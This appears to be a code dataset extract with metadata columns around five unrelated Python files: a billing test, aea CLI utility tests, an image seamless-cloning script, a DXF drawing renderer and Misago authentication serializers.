| 0.005556
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
60ff05c6f96bea8d8b81dd6255359543dc3d93ad
| 1,562
|
py
|
Python
|
src/waldur_mastermind/billing/tests/test_price_current.py
|
opennode/nodeconductor-assembly-waldur
|
cad9966389dc9b52b13d2301940c99cf4b243900
|
[
"MIT"
] | 2
|
2017-01-20T15:26:25.000Z
|
2017-08-03T04:38:08.000Z
|
src/waldur_mastermind/billing/tests/test_price_current.py
|
opennode/nodeconductor-assembly-waldur
|
cad9966389dc9b52b13d2301940c99cf4b243900
|
[
"MIT"
] | null | null | null |
src/waldur_mastermind/billing/tests/test_price_current.py
|
opennode/nodeconductor-assembly-waldur
|
cad9966389dc9b52b13d2301940c99cf4b243900
|
[
"MIT"
] | null | null | null |
from freezegun import freeze_time
from rest_framework import test
from waldur_mastermind.billing.tests.utils import get_financial_report_url
from waldur_mastermind.invoices import models as invoice_models
from waldur_mastermind.invoices.tests import factories as invoice_factories
from waldur_mastermind.invoices.tests import fixtures as invoice_fixtures
@freeze_time('2017-01-10')
class PriceCurrentTest(test.APITransactionTestCase):
def setUp(self):
self.fixture = invoice_fixtures.InvoiceFixture()
invoice_factories.InvoiceItemFactory(
invoice=self.fixture.invoice,
project=self.fixture.project,
unit=invoice_models.InvoiceItem.Units.PER_MONTH,
unit_price=100,
quantity=1,
)
invoice_factories.InvoiceItemFactory(
invoice=self.fixture.invoice,
project=self.fixture.project,
unit=invoice_models.InvoiceItem.Units.PER_DAY,
unit_price=3,
quantity=31,
)
def test_current_price(self):
self.client.force_authenticate(self.fixture.staff)
url = get_financial_report_url(self.fixture.project.customer)
response = self.client.get(url)
self.assertEqual(response.status_code, 200)
data = response.json()
self.assertEqual(data['billing_price_estimate']['current'], 100 + 9 * 3)
diff = (
data['billing_price_estimate']['total']
- data['billing_price_estimate']['current']
)
self.assertEqual(diff, 22 * 3)
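# Hedged reading of the arithmetic above (not in the original file): with time frozen at 2017-01-10,
# the PER_DAY item (unit_price=3, quantity=31) has presumably accrued 9 full days, so
# current = 100 (PER_MONTH) + 9 * 3, while the total covers all 31 days, leaving 22 * 3 = 66 still to accrue.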
| 37.190476
| 80
| 0.68822
| 174
| 1,562
| 5.977011
| 0.37931
| 0.074038
| 0.076923
| 0.080769
| 0.365385
| 0.305769
| 0.230769
| 0.230769
| 0.230769
| 0.230769
| 0
| 0.021488
| 0.225352
| 1,562
| 41
| 81
| 38.097561
| 0.838017
| 0
| 0
| 0.166667
| 0
| 0
| 0.060819
| 0.042254
| 0
| 0
| 0
| 0
| 0.083333
| 1
| 0.055556
| false
| 0
| 0.166667
| 0
| 0.25
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
60ff33dc263000945ad4491d74e8e10a35657808
| 16,741
|
py
|
Python
|
tests/test_cli/test_utils/test_utils.py
|
ejfitzgerald/agents-aea
|
6411fcba8af2cdf55a3005939ae8129df92e8c3e
|
[
"Apache-2.0"
] | null | null | null |
tests/test_cli/test_utils/test_utils.py
|
ejfitzgerald/agents-aea
|
6411fcba8af2cdf55a3005939ae8129df92e8c3e
|
[
"Apache-2.0"
] | null | null | null |
tests/test_cli/test_utils/test_utils.py
|
ejfitzgerald/agents-aea
|
6411fcba8af2cdf55a3005939ae8129df92e8c3e
|
[
"Apache-2.0"
] | null | null | null |
# -*- coding: utf-8 -*-
# ------------------------------------------------------------------------------
#
# Copyright 2018-2019 Fetch.AI Limited
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# ------------------------------------------------------------------------------
"""This test module contains the tests for aea.cli.utils module."""
from builtins import FileNotFoundError
from typing import cast
from unittest import TestCase, mock
from click import BadParameter, ClickException
from jsonschema import ValidationError
from yaml import YAMLError
from aea.cli.utils.click_utils import AEAJsonPathType, PublicIdParameter
from aea.cli.utils.config import (
_init_cli_config,
get_or_create_cli_config,
update_cli_config,
)
from aea.cli.utils.context import Context
from aea.cli.utils.decorators import _validate_config_consistency, clean_after
from aea.cli.utils.formatting import format_items
from aea.cli.utils.generic import is_readme_present
from aea.cli.utils.package_utils import (
find_item_in_distribution,
find_item_locally,
is_fingerprint_correct,
try_get_balance,
try_get_item_source_path,
try_get_item_target_path,
validate_author_name,
validate_package_name,
)
from tests.conftest import FETCHAI
from tests.test_cli.tools_for_testing import (
ConfigLoaderMock,
ContextMock,
PublicIdMock,
StopTest,
raise_stoptest,
)
AUTHOR = "author"
class FormatItemsTestCase(TestCase):
"""Test case for format_items method."""
def testformat_items_positive(self):
"""Test format_items positive result."""
items = [
{
"public_id": "author/name:version",
"name": "obj-name",
"description": "Some description",
"author": "author",
"version": "1.0",
}
]
result = format_items(items)
expected_result = (
"------------------------------\n"
"Public ID: author/name:version\n"
"Name: obj-name\n"
"Description: Some description\n"
"Author: author\n"
"Version: 1.0\n"
"------------------------------\n"
)
self.assertEqual(result, expected_result)
@mock.patch("aea.cli.utils.package_utils.os.path.join", return_value="some-path")
class TryGetItemSourcePathTestCase(TestCase):
"""Test case for try_get_item_source_path method."""
@mock.patch("aea.cli.utils.package_utils.os.path.exists", return_value=True)
def test_get_item_source_path_positive(self, exists_mock, join_mock):
"""Test for get_item_source_path positive result."""
result = try_get_item_source_path("cwd", AUTHOR, "skills", "skill-name")
expected_result = "some-path"
self.assertEqual(result, expected_result)
join_mock.assert_called_once_with("cwd", AUTHOR, "skills", "skill-name")
exists_mock.assert_called_once_with("some-path")
result = try_get_item_source_path("cwd", None, "skills", "skill-name")
self.assertEqual(result, expected_result)
@mock.patch("aea.cli.utils.package_utils.os.path.exists", return_value=False)
def test_get_item_source_path_not_exists(self, exists_mock, join_mock):
"""Test for get_item_source_path item already exists."""
with self.assertRaises(ClickException):
try_get_item_source_path("cwd", AUTHOR, "skills", "skill-name")
@mock.patch("aea.cli.utils.package_utils.os.path.join", return_value="some-path")
class TryGetItemTargetPathTestCase(TestCase):
"""Test case for try_get_item_target_path method."""
@mock.patch("aea.cli.utils.package_utils.os.path.exists", return_value=False)
def test_get_item_target_path_positive(self, exists_mock, join_mock):
"""Test for get_item_source_path positive result."""
result = try_get_item_target_path("packages", AUTHOR, "skills", "skill-name")
expected_result = "some-path"
self.assertEqual(result, expected_result)
join_mock.assert_called_once_with("packages", AUTHOR, "skills", "skill-name")
exists_mock.assert_called_once_with("some-path")
@mock.patch("aea.cli.utils.package_utils.os.path.exists", return_value=True)
def test_get_item_target_path_already_exists(self, exists_mock, join_mock):
"""Test for get_item_target_path item already exists."""
with self.assertRaises(ClickException):
try_get_item_target_path("skills", AUTHOR, "skill-name", "packages_path")
class PublicIdParameterTestCase(TestCase):
"""Test case for PublicIdParameter class."""
def test_get_metavar_positive(self):
"""Test for get_metavar positive result."""
result = PublicIdParameter.get_metavar("obj", "param")
expected_result = "PUBLIC_ID"
self.assertEqual(result, expected_result)
@mock.patch("aea.cli.utils.config.os.path.dirname", return_value="dir-name")
@mock.patch("aea.cli.utils.config.os.path.exists", return_value=False)
@mock.patch("aea.cli.utils.config.os.makedirs")
@mock.patch("builtins.open")
class InitConfigFolderTestCase(TestCase):
"""Test case for _init_cli_config method."""
def test_init_cli_config_positive(
self, open_mock, makedirs_mock, exists_mock, dirname_mock
):
"""Test for _init_cli_config method positive result."""
_init_cli_config()
dirname_mock.assert_called_once()
exists_mock.assert_called_once_with("dir-name")
makedirs_mock.assert_called_once_with("dir-name")
@mock.patch("aea.cli.utils.config.get_or_create_cli_config")
@mock.patch("aea.cli.utils.generic.yaml.dump")
@mock.patch("builtins.open", mock.mock_open())
class UpdateCLIConfigTestCase(TestCase):
"""Test case for update_cli_config method."""
def testupdate_cli_config_positive(self, dump_mock, icf_mock):
"""Test for update_cli_config method positive result."""
update_cli_config({"some": "config"})
icf_mock.assert_called_once()
dump_mock.assert_called_once()
def _raise_yamlerror(*args):
raise YAMLError()
def _raise_file_not_found_error(*args):
raise FileNotFoundError()
@mock.patch("builtins.open", mock.mock_open())
class GetOrCreateCLIConfigTestCase(TestCase):
"""Test case for read_cli_config method."""
@mock.patch(
"aea.cli.utils.generic.yaml.safe_load", return_value={"correct": "output"}
)
def testget_or_create_cli_config_positive(self, safe_load_mock):
"""Test for get_or_create_cli_config method positive result."""
result = get_or_create_cli_config()
expected_result = {"correct": "output"}
self.assertEqual(result, expected_result)
safe_load_mock.assert_called_once()
@mock.patch("aea.cli.utils.generic.yaml.safe_load", _raise_yamlerror)
def testget_or_create_cli_config_bad_yaml(self):
"""Test for rget_or_create_cli_config method bad yaml behavior."""
with self.assertRaises(ClickException):
get_or_create_cli_config()
class CleanAfterTestCase(TestCase):
"""Test case for clean_after decorator method."""
@mock.patch("aea.cli.utils.decorators.os.path.exists", return_value=True)
@mock.patch("aea.cli.utils.decorators._cast_ctx", lambda x: x)
@mock.patch("aea.cli.utils.decorators.shutil.rmtree")
def test_clean_after_positive(self, rmtree_mock, *mocks):
"""Test clean_after decorator method for positive result."""
@clean_after
def func(click_context):
ctx = cast(Context, click_context.obj)
ctx.clean_paths.append("clean/path")
raise ClickException("Message")
with self.assertRaises(ClickException):
func(ContextMock())
rmtree_mock.assert_called_once_with("clean/path")
@mock.patch("aea.cli.utils.package_utils.click.echo", raise_stoptest)
class ValidateAuthorNameTestCase(TestCase):
"""Test case for validate_author_name method."""
@mock.patch(
"aea.cli.utils.package_utils.click.prompt", return_value="correct_author"
)
def test_validate_author_name_positive(self, prompt_mock):
"""Test validate_author_name for positive result."""
author = "valid_author"
result = validate_author_name(author=author)
self.assertEqual(result, author)
result = validate_author_name()
self.assertEqual(result, "correct_author")
prompt_mock.assert_called_once()
@mock.patch(
"aea.cli.utils.package_utils.click.prompt", return_value="inv@l1d_@uth&r"
)
def test_validate_author_name_negative(self, prompt_mock):
"""Test validate_author_name for negative result."""
with self.assertRaises(StopTest):
validate_author_name()
prompt_mock.return_value = "skills"
with self.assertRaises(StopTest):
validate_author_name()
class ValidatePackageNameTestCase(TestCase):
"""Test case for validate_package_name method."""
def test_validate_package_name_positive(self):
"""Test validate_package_name for positive result."""
validate_package_name("correct_name")
def test_validate_package_name_negative(self):
"""Test validate_package_name for negative result."""
with self.assertRaises(BadParameter):
validate_package_name("incorrect-name")
def _raise_validation_error(*args, **kwargs):
raise ValidationError("Message.")
class FindItemLocallyTestCase(TestCase):
"""Test case for find_item_locally method."""
@mock.patch("aea.cli.utils.package_utils.Path.exists", return_value=True)
@mock.patch(
"aea.cli.utils.package_utils.ConfigLoader.from_configuration_type",
_raise_validation_error,
)
def test_find_item_locally_bad_config(self, *mocks):
"""Test find_item_locally for bad config result."""
public_id = PublicIdMock.from_str("fetchai/echo:0.5.0")
with self.assertRaises(ClickException) as cm:
find_item_locally(ContextMock(), "skill", public_id)
self.assertIn("configuration file not valid", cm.exception.message)
@mock.patch("aea.cli.utils.package_utils.Path.exists", return_value=True)
@mock.patch("aea.cli.utils.package_utils.Path.open", mock.mock_open())
@mock.patch(
"aea.cli.utils.package_utils.ConfigLoader.from_configuration_type",
return_value=ConfigLoaderMock(),
)
def test_find_item_locally_cant_find(self, from_conftype_mock, *mocks):
"""Test find_item_locally for can't find result."""
public_id = PublicIdMock.from_str("fetchai/echo:0.5.0")
with self.assertRaises(ClickException) as cm:
find_item_locally(ContextMock(), "skill", public_id)
self.assertEqual(
cm.exception.message, "Cannot find skill with author and version specified."
)
class FindItemInDistributionTestCase(TestCase):
"""Test case for find_item_in_distribution method."""
@mock.patch("aea.cli.utils.package_utils.Path.exists", return_value=True)
@mock.patch(
"aea.cli.utils.package_utils.ConfigLoader.from_configuration_type",
_raise_validation_error,
)
def testfind_item_in_distribution_bad_config(self, *mocks):
"""Test find_item_in_distribution for bad config result."""
public_id = PublicIdMock.from_str("fetchai/echo:0.5.0")
with self.assertRaises(ClickException) as cm:
find_item_in_distribution(ContextMock(), "skill", public_id)
self.assertIn("configuration file not valid", cm.exception.message)
@mock.patch("aea.cli.utils.package_utils.Path.exists", return_value=False)
def testfind_item_in_distribution_not_found(self, *mocks):
"""Test find_item_in_distribution for not found result."""
public_id = PublicIdMock.from_str("fetchai/echo:0.5.0")
with self.assertRaises(ClickException) as cm:
find_item_in_distribution(ContextMock(), "skill", public_id)
self.assertIn("Cannot find skill", cm.exception.message)
@mock.patch("aea.cli.utils.package_utils.Path.exists", return_value=True)
@mock.patch("aea.cli.utils.package_utils.Path.open", mock.mock_open())
@mock.patch(
"aea.cli.utils.package_utils.ConfigLoader.from_configuration_type",
return_value=ConfigLoaderMock(),
)
def testfind_item_in_distribution_cant_find(self, from_conftype_mock, *mocks):
"""Test find_item_locally for can't find result."""
public_id = PublicIdMock.from_str("fetchai/echo:0.5.0")
with self.assertRaises(ClickException) as cm:
find_item_in_distribution(ContextMock(), "skill", public_id)
self.assertEqual(
cm.exception.message, "Cannot find skill with author and version specified."
)
class ValidateConfigConsistencyTestCase(TestCase):
"""Test case for _validate_config_consistency method."""
@mock.patch("aea.cli.utils.config.Path.exists", _raise_validation_error)
def test__validate_config_consistency_cant_find(self, *mocks):
"""Test _validate_config_consistency can't find result"""
with self.assertRaises(ValueError) as cm:
_validate_config_consistency(ContextMock(protocols=["some"]))
self.assertIn("Cannot find", str(cm.exception))
@mock.patch(
"aea.cli.utils.package_utils._compute_fingerprint",
return_value={"correct": "fingerprint"},
)
class IsFingerprintCorrectTestCase(TestCase):
"""Test case for adding skill with invalid fingerprint."""
def test_is_fingerprint_correct_positive(self, *mocks):
"""Test is_fingerprint_correct method for positive result."""
item_config = mock.Mock()
item_config.fingerprint = {"correct": "fingerprint"}
item_config.fingerprint_ignore_patterns = []
result = is_fingerprint_correct("package_path", item_config)
self.assertTrue(result)
def test_is_fingerprint_correct_negative(self, *mocks):
"""Test is_fingerprint_correct method for negative result."""
item_config = mock.Mock()
item_config.fingerprint = {"incorrect": "fingerprint"}
item_config.fingerprint_ignore_patterns = []
package_path = "package_dir"
result = is_fingerprint_correct(package_path, item_config)
self.assertFalse(result)
@mock.patch("aea.cli.config.click.ParamType")
class AEAJsonPathTypeTestCase(TestCase):
"""Test case for AEAJsonPathType class."""
@mock.patch("aea.cli.utils.click_utils.Path.exists", return_value=True)
def test_convert_root_vendor_positive(self, *mocks):
"""Test for convert method with root "vendor" positive result."""
value = "vendor.author.protocols.package_name.attribute_name"
ctx_mock = ContextMock()
ctx_mock.obj = mock.Mock()
ctx_mock.obj.set_config = mock.Mock()
obj = AEAJsonPathType()
obj.convert(value, "param", ctx_mock)
@mock.patch("aea.cli.utils.click_utils.Path.exists", return_value=False)
def test_convert_root_vendor_path_not_exists(self, *mocks):
"""Test for convert method with root "vendor" path not exists."""
value = "vendor.author.protocols.package_name.attribute_name"
obj = AEAJsonPathType()
with self.assertRaises(BadParameter):
obj.convert(value, "param", "ctx")
@mock.patch("aea.cli.utils.package_utils.LedgerApis", mock.MagicMock())
class TryGetBalanceTestCase(TestCase):
"""Test case for try_get_balance method."""
def test_try_get_balance_positive(self):
"""Test for try_get_balance method positive result."""
agent_config = mock.Mock()
agent_config.default_ledger_config = FETCHAI
wallet_mock = mock.Mock()
wallet_mock.addresses = {FETCHAI: "some-adress"}
try_get_balance(agent_config, wallet_mock, FETCHAI)
@mock.patch("aea.cli.utils.generic.os.path.exists", return_value=True)
class IsReadmePresentTestCase(TestCase):
"""Test case for is_readme_present method."""
def test_is_readme_present_positive(self, *mocks):
"""Test is_readme_present for positive result."""
self.assertTrue(is_readme_present("readme/path"))
| 39.206089
| 88
| 0.696792
| 2,063
| 16,741
| 5.383907
| 0.128454
| 0.024309
| 0.043576
| 0.049968
| 0.588998
| 0.494103
| 0.439092
| 0.395696
| 0.338795
| 0.311245
| 0
| 0.002403
| 0.179798
| 16,741
| 426
| 89
| 39.298122
| 0.806496
| 0.173227
| 0
| 0.293478
| 0
| 0
| 0.201941
| 0.124871
| 0
| 0
| 0
| 0
| 0.155797
| 1
| 0.112319
| false
| 0
| 0.054348
| 0
| 0.228261
| 0.043478
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
88019b110382885f8543e3444fa6b00a5c38b567
| 3,691
|
py
|
Python
|
run_clone.py
|
tGhattas/IMP-seamless-cloning
|
2c81e0bd9bc99955afe06ec4eea187a5a42761e3
|
[
"MIT"
] | null | null | null |
run_clone.py
|
tGhattas/IMP-seamless-cloning
|
2c81e0bd9bc99955afe06ec4eea187a5a42761e3
|
[
"MIT"
] | null | null | null |
run_clone.py
|
tGhattas/IMP-seamless-cloning
|
2c81e0bd9bc99955afe06ec4eea187a5a42761e3
|
[
"MIT"
] | null | null | null |
import cv2
import getopt
import sys
from gui import MaskPainter, MaskMover
from clone import seamless_cloning, shepards_seamless_cloning
from utils import read_image, plt
from os import path
def usage():
print(
"Usage: python run_clone.py [options] \n\n\
Options: \n\
\t-h\t Flag to print this brief help message and exit.\n\
\t-s\t(Required) Specify a source image.\n\
\t-t\t(Required) Specify a target image.\n\
\t-m\t(Optional) Specify a mask image with the object in white and the rest in black; ignore this option if you plan to draw the mask later.\n\
\t-x\t(Optional) Flag to use Shepard's interpolation instead of the default Poisson solver.\n\
\t-v\t(Optional) Flag to use the gradient fields of both source and target (instead of source only) when the Poisson solver is used. Default is source only.")
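# Hedged example invocations (file names are illustrative, not from this repository):
#   python run_clone.py -s external/source.jpg -t external/target.jpg -m external/mask.png
#   python run_clone.py -s external/source.jpg -t external/target.jpg -x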
if __name__ == '__main__':
# parse command line arguments
args = {}
try:
opts, _ = getopt.getopt(sys.argv[1:], "vxhs:t:m:p:")
except getopt.GetoptError as err:
# print help information and exit:
print(err) # will print something like "option -a not recognized"
print("See help: run_clone.py -h")
exit(2)
for o, a in opts:
if o in ("-h"):
usage()
exit()
elif o in ("-s"):
args["source"] = a
elif o in ("-t"):
args["target"] = a
elif o in ("-m"):
args["mask"] = a
elif o in ("-x"):
args["mode"] = a.lower()
elif o in ("-v"):
args["gradient_field_source_only"] = a
else:
continue
#
if ("source" not in args) or ("target" not in args):
usage()
exit()
#
# set default mode to Poisson solver
mode = "poisson" if ("mode" not in args) else args["mode"]
gradient_field_source_only = ("gradient_field_source_only" not in args)
source = read_image(args["source"], 2)
target = read_image(args["target"], 2)
if source is None or target is None:
print('Source or target image does not exist.')
exit()
if source.shape[0] > target.shape[0] or source.shape[1] > target.shape[1]:
print('Source image cannot be larger than target image.')
exit()
# draw the mask
mask_path = ""
if "mask" not in args:
print('Please highlight the object to disapparate.\n')
mp = MaskPainter(args["source"])
mask_path = mp.paint_mask()
else:
mask_path = args["mask"]
# adjust mask position for target image
print('Please move the object to desired location to apparate.\n')
mm = MaskMover(args["target"], mask_path)
offset_x, offset_y, target_mask_path = mm.move_mask()
# blend
print('Blending ...')
target_mask = read_image(target_mask_path, 1)
offset = offset_x, offset_y
cloning_tool = seamless_cloning if mode == "poisson" else shepards_seamless_cloning
kwargs = {"gradient_field_source_only": gradient_field_source_only} if mode == "poisson" else {}
blend_result = cloning_tool(source, target, target_mask, offset, **kwargs)
cv2.imwrite(path.join(path.dirname(args["source"]), 'target_result.png'),
blend_result)
plt.figure("Result"), plt.imshow(blend_result), plt.show()
print('Done.\n')
'''
running example:
- Poisson based solver:
python run_clone.py -s external/blend-1.jpg -t external/main-1.jpg
python run_clone.py -s external/source3.jpg -t external/target3.jpg -v
- Shepard's interpolation:
python run_clone.py -s external/blend-1.jpg -t external/main-1.jpg -x
python run_clone.py -s external/source3.jpg -t external/target3.jpg -x
'''
| 33.554545
| 147
| 0.629098
| 538
| 3,691
| 4.200743
| 0.289963
| 0.030973
| 0.026549
| 0.035398
| 0.153097
| 0.133628
| 0.133628
| 0.133628
| 0.09292
| 0.09292
| 0
| 0.006874
| 0.251151
| 3,691
| 110
| 148
| 33.554545
| 0.810781
| 0.056082
| 0
| 0.108108
| 0
| 0.040541
| 0.151379
| 0.025016
| 0
| 0
| 0
| 0
| 0
| 1
| 0.013514
| false
| 0
| 0.094595
| 0
| 0.108108
| 0.121622
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
88044ce700e39ec36bb7ba44d3c9905b593ae3a4
| 4,460
|
py
|
Python
|
painter.py
|
MikhailNakhatovich/rooms_painting
|
51b92797c867d4bb1c8d42a58785c0f4dacd4075
|
[
"MIT"
] | null | null | null |
painter.py
|
MikhailNakhatovich/rooms_painting
|
51b92797c867d4bb1c8d42a58785c0f4dacd4075
|
[
"MIT"
] | null | null | null |
painter.py
|
MikhailNakhatovich/rooms_painting
|
51b92797c867d4bb1c8d42a58785c0f4dacd4075
|
[
"MIT"
] | null | null | null |
import cv2
import ezdxf
import numpy as np
def draw_hatch(img, entity, color, mask):
for poly_path in entity.paths.paths:
# print(poly_path.path_type_flags)
polygon = np.array([vertex[:-1] for vertex in poly_path.vertices]).astype(int)
if poly_path.path_type_flags & 1 == 1:
cv2.fillPoly(img, [polygon], color)
cv2.fillPoly(mask, [polygon], (255, 255, 255))
else:
cv2.fillPoly(img, [polygon], (255, 255, 255))
return color
def draw_line(img, entity, color, mask):
p1 = entity.dxf.start[:-1]
p2 = entity.dxf.end[:-1]
cv2.line(img, (int(p1[0]), int(p1[1])), (int(p2[0]), int(p2[1])), color, 1)
cv2.line(mask, (int(p1[0]), int(p1[1])), (int(p2[0]), int(p2[1])), (255, 255, 255), 2)
return color
def draw_lwpolyline(img, entity, color, mask):
polyline = []
a = np.array(entity.lwpoints.values).astype(int)
while len(a) > 0:
polyline.append((a[0], a[1]))
a = a[5:]
cv2.polylines(img, [np.array(polyline)], entity.closed, color, 1)
cv2.polylines(mask, [np.array(polyline)], entity.closed, (255, 255, 255), 2)
return color
def draw_arc(img, entity, color, mask):
s = entity.dxf.start_angle * np.pi / 180
e = entity.dxf.end_angle * np.pi / 180
if s > e:
s -= 2 * np.pi
d = (e - s) / (int((e - s) * 180 / np.pi) + 1)
r = entity.dxf.radius
cx, cy = entity.dxf.center.xyz[:-1]
angles = np.arange(s, e + d / 2, d)
x = cx + r * np.cos(angles)
y = cy + r * np.sin(angles)
points = np.column_stack((x, y)).astype(int)
cv2.polylines(img, [points], abs(s - e) < 1e-9, color, 1)
cv2.polylines(mask, [points], abs(s - e) < 1e-9, (255, 255, 255), 2)
return color
def draw_circle(img, entity, color, mask):
r = entity.dxf.radius
cx, cy = entity.dxf.center.xyz[:-1]
cv2.circle(img, (int(cx), int(cy)), int(r), color, 1)
cv2.circle(mask, (int(cx), int(cy)), int(r), (255, 255, 255), -1)
return color
def draw_ellipse(img, entity, color, mask):
cx, cy = entity.dxf.center.xyz[:-1]
ma = entity.dxf.major_axis.magnitude
angle = entity.dxf.major_axis.angle_deg
mi = ma * entity.dxf.ratio
s = entity.dxf.start_param * 180 / np.pi
e = entity.dxf.end_param * 180 / np.pi
if entity.dxf.extrusion.z == -1:
s = 360 - s
e = 360 - e
cv2.ellipse(img, (int(cx), int(cy)), (int(ma), int(mi)), angle, s, e, color, 1)
cv2.ellipse(mask, (int(cx), int(cy)), (int(ma), int(mi)), angle, s, e, (255, 255, 255), 1)
return color
def draw_point(img, entity, color, mask):
cx, cy = entity.dxf.location.xyz[:-1]
cv2.circle(img, (int(cx), int(cy)), 0, color, 1)
cv2.circle(mask, (int(cx), int(cy)), 0, (255, 255, 255), -1)
return color
draw_map = {
'HATCH': draw_hatch,
'LINE': draw_line,
'LWPOLYLINE': draw_lwpolyline,
'ARC': draw_arc,
'CIRCLE': draw_circle,
'ELLIPSE': draw_ellipse,
'POINT': draw_point,
}
def paint(in_path, out_path, config):
doc = ezdxf.readfile(in_path)
extmax, extmin = doc.header['$EXTMAX'], doc.header['$EXTMIN']
xmin, ymin = np.floor(extmin[:-1]).astype(int)
xmax, ymax = np.ceil(extmax[:-1]).astype(int)
img = np.ones((ymax + ymin, xmax + xmin, 3), np.uint8) * 255
mask = np.zeros_like(img)
msp = doc.modelspace()
layers = config.get('layers', {})
colors = config.get('colors', {})
# print(doc.layers.entries.keys())
for layer_name, names in layers.items():
color = tuple(colors.get(layer_name, [0, 0, 0]))
for name in names:
if name not in doc.layers:
continue
entities = msp.query('*[layer=="%s"]' % name)
tmp = np.zeros((ymax + ymin, xmax + xmin), np.uint8)
for entity in entities:
if entity.DXFTYPE in draw_map:
draw_map[entity.DXFTYPE](img, entity, color, tmp)
else:
print("%s: %s" % (name, entity.DXFTYPE))
contours, hierarchy = cv2.findContours(tmp, cv2.RETR_EXTERNAL, cv2.CHAIN_APPROX_SIMPLE)
cv2.drawContours(mask, contours, -1, color, -1)
res, img_png = cv2.imencode('.png', cv2.flip(img, 0))
res, mask_png = cv2.imencode('.png', cv2.flip(mask, 0))
with open(out_path, 'wb') as f:
f.write(img_png.tobytes())
with open(out_path[:-4] + "_mask.png", 'wb') as f:
f.write(mask_png.tobytes())
| 35.11811
| 99
| 0.578924
| 686
| 4,460
| 3.69242
| 0.218659
| 0.0379
| 0.044216
| 0.049743
| 0.305567
| 0.240821
| 0.196605
| 0.192657
| 0.11291
| 0.071062
| 0
| 0.054997
| 0.241704
| 4,460
| 126
| 100
| 35.396825
| 0.693968
| 0.014574
| 0
| 0.133333
| 0
| 0
| 0.024362
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.07619
| false
| 0
| 0.028571
| 0
| 0.171429
| 0.009524
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
8804685e3bac745bbfacb5b5cab8b6e032a05238
| 3,064
|
py
|
Python
|
misago/misago/users/serializers/auth.py
|
vascoalramos/misago-deployment
|
20226072138403108046c0afad9d99eb4163cedc
|
[
"MIT"
] | 2
|
2021-03-06T21:06:13.000Z
|
2021-03-09T15:05:12.000Z
|
misago/misago/users/serializers/auth.py
|
vascoalramos/misago-deployment
|
20226072138403108046c0afad9d99eb4163cedc
|
[
"MIT"
] | null | null | null |
misago/misago/users/serializers/auth.py
|
vascoalramos/misago-deployment
|
20226072138403108046c0afad9d99eb4163cedc
|
[
"MIT"
] | null | null | null |
from django.contrib.auth import get_user_model
from django.urls import reverse
from rest_framework import serializers
from ...acl.useracl import serialize_user_acl
from .user import UserSerializer
User = get_user_model()
__all__ = ["AuthenticatedUserSerializer", "AnonymousUserSerializer"]
class AuthFlags:
def get_is_authenticated(self, obj):
return bool(obj.is_authenticated)
def get_is_anonymous(self, obj):
return bool(obj.is_anonymous)
class AuthenticatedUserSerializer(UserSerializer, AuthFlags):
email = serializers.SerializerMethodField()
is_authenticated = serializers.SerializerMethodField()
is_anonymous = serializers.SerializerMethodField()
class Meta:
model = User
fields = UserSerializer.Meta.fields + [
"has_usable_password",
"is_hiding_presence",
"limits_private_thread_invites_to",
"unread_private_threads",
"subscribe_to_started_threads",
"subscribe_to_replied_threads",
"is_authenticated",
"is_anonymous",
]
def get_acl(self, obj):
acl = self.context.get("acl")
if acl:
return serialize_user_acl(acl)
return {}
def get_email(self, obj):
return obj.email
def get_api(self, obj):
return {
"avatar": reverse("misago:api:user-avatar", kwargs={"pk": obj.pk}),
"data_downloads": reverse(
"misago:api:user-data-downloads", kwargs={"pk": obj.pk}
),
"details": reverse("misago:api:user-details", kwargs={"pk": obj.pk}),
"change_email": reverse(
"misago:api:user-change-email", kwargs={"pk": obj.pk}
),
"change_password": reverse(
"misago:api:user-change-password", kwargs={"pk": obj.pk}
),
"edit_details": reverse(
"misago:api:user-edit-details", kwargs={"pk": obj.pk}
),
"options": reverse("misago:api:user-forum-options", kwargs={"pk": obj.pk}),
"request_data_download": reverse(
"misago:api:user-request-data-download", kwargs={"pk": obj.pk}
),
"username": reverse("misago:api:user-username", kwargs={"pk": obj.pk}),
"delete": reverse(
"misago:api:user-delete-own-account", kwargs={"pk": obj.pk}
),
}
AuthenticatedUserSerializer = AuthenticatedUserSerializer.exclude_fields(
"is_avatar_locked",
"is_blocked",
"is_followed",
"is_signature_locked",
"meta",
"signature",
"status",
)
class AnonymousUserSerializer(serializers.Serializer, AuthFlags):
id = serializers.ReadOnlyField()
acl = serializers.SerializerMethodField()
is_authenticated = serializers.SerializerMethodField()
is_anonymous = serializers.SerializerMethodField()
def get_acl(self, obj):
acl = self.context.get("acl")
if acl:
return serialize_user_acl(acl)
